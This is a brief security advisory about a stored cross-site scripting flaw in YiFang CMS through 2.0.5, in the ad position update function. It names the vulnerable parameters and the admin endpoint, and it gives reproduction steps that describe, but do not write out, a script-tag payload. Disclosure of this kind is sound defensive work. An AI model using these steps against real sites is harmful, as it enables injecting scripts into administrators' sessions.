YiFang CMS Cross-Site Scripting Vulnerability in the Extended Management Module
Vulnerability
A cross-site scripting (XSS) vulnerability has been identified in YiFang CMS versions through 2.0.5. The issue resides in the Extended Management Module, specifically within the 'update' function of 'app/db/admin/D_adPosition.php'. This vulnerability allows for stored XSS, as the 'name' and 'index' parameters can be manipulated and are saved in the database without proper sanitization. The malicious scripts are executed when the ad placement list is accessed. The vulnerability can be exploited remotely, but requires authentication and user interaction.
Impact
Exploitation of this vulnerability allows for cross-site scripting, where an attacker can inject malicious scripts that are executed in the context of the user viewing the ad placement list.
Reproduction
To reproduce this vulnerability, authenticate and navigate to the ad position update interface. Send a POST request to '/admin/adPosition/update' with the 'name' or 'index' parameter containing a crafted payload, such as a script tag with an 'onload' event. The injected script will execute when the ad placement list is accessed.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.